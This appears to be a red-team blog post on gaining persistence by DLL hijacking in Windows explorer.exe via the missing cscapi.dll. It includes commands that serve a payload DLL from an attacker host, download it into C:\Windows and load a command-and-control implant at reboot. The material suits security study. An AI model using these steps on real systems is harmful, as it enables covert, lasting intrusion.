Persistence – Explorer

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process explorer.exe. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the explorer.exe for results that contain NAME NOT FOUND. One of the missing DLL’s that explorer.exe is missing is the cscapi. Process Monitor – cscapi.dll An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command: python3 -m http.server 8080 Python Web Server A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into C:\Windows path. The tool require the IP address and the port of the server hosting the DLL and the DLL name. DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll Explorer.exe – DLL Hijacking Explorer.exe – cscapi.dll The arbitrary DLL will load into the explorer.exe process on the next reboot and a communication channel with the Command and Control will established. Explorer.exe – Implant Host Enumeration References https://github.com/gavz/ExplorerPersist Rate this: 2 Votes Share this: Loading... Related Persistence – Winlogon Helper DLL January 14, 2020 In "Persistence" Persistence – Application Shimming December 16, 2019 In "Persistence" Parent PID Spoofing February 24, 2020 In "Defense Evasion" 2 Comments Leave a comment